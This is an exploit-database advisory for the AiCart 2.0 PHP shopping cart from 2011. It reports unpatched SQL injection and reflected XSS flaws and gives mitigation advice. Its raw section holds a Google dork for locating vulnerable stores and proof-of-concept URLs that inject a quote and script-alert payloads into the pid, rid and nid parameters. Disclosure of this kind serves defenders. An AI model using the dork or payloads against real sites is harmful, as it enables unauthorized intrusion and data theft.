AiCart 2.0 Multiple Vulnerabilities

vendor:

AiCart

by:

takeshix

7.5

CVSS

HIGH

SQL Injection, XSS

89 (SQL Injection), 79 (XSS)

CWE

Product Name: AiCart

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: -

CPE: a:aicart:aicart:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Fedora

2011

AiCart 2.0 Multiple Vulnerabilities

AiCart 2.0 is vulnerable to multiple SQL Injection and XSS vulnerabilities. An attacker can inject malicious SQL queries and XSS payloads into the vulnerable parameters of the application. This can lead to the compromise of the application and the underlying system.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it is valid and expected. Sanitize all user-supplied data before using it in the application. Use parameterized queries to prevent SQL Injection attacks. Use a web application firewall to detect and block malicious requests.

Source

Exploit-DB raw data:

=================================[ AiCart 2.0 Multiple Vulnerabilities ]===================================

== Infos ==================================================================================================

[ Date ]				[ 18.06.2011 ]
[ Software URL ]			[ http://www.aicart.ca/ ]
[ Version ]				[ 2.0 ]
[ Google Dork ]				[ inurl:'/store.php?action=view_product pid=' ]
[ System ]				[ PHP ]
[ Testing System ]			[ Fedora ]
[ Risk Level ]				[ High ]
[ CVE ]					[ - ]

== Autor Details ==========================================================================================

[ Autor ]				[ takeshix ]
[ Autor Contact ]			[ takeshix.query@googlemail.com ]

== PoC ====================================================================================================

[ SQLi ]	http://localhost/store.php?action=view_product?pid='
[ SQLi ]	http://localhost/store.php?rid='
[ SQLi ]	http://localhost/news.php?nid='&action=view

[ XSS ]		http://localhost/store.php?action=view_product?pid=<script>alert('takeshix')</script>
[ XSS ]		http://localhost/store.php?rid=<script>alert('takeshix')</script>
[ Xss ]		http://localhost/news.php?nid=<script>alert('takeshix')</script>&action=view

== Greez ==================================================================================================

[ hackademics ] [ DSU ] [ UNITS ]

=============================================[ hacktivistas ]==============================================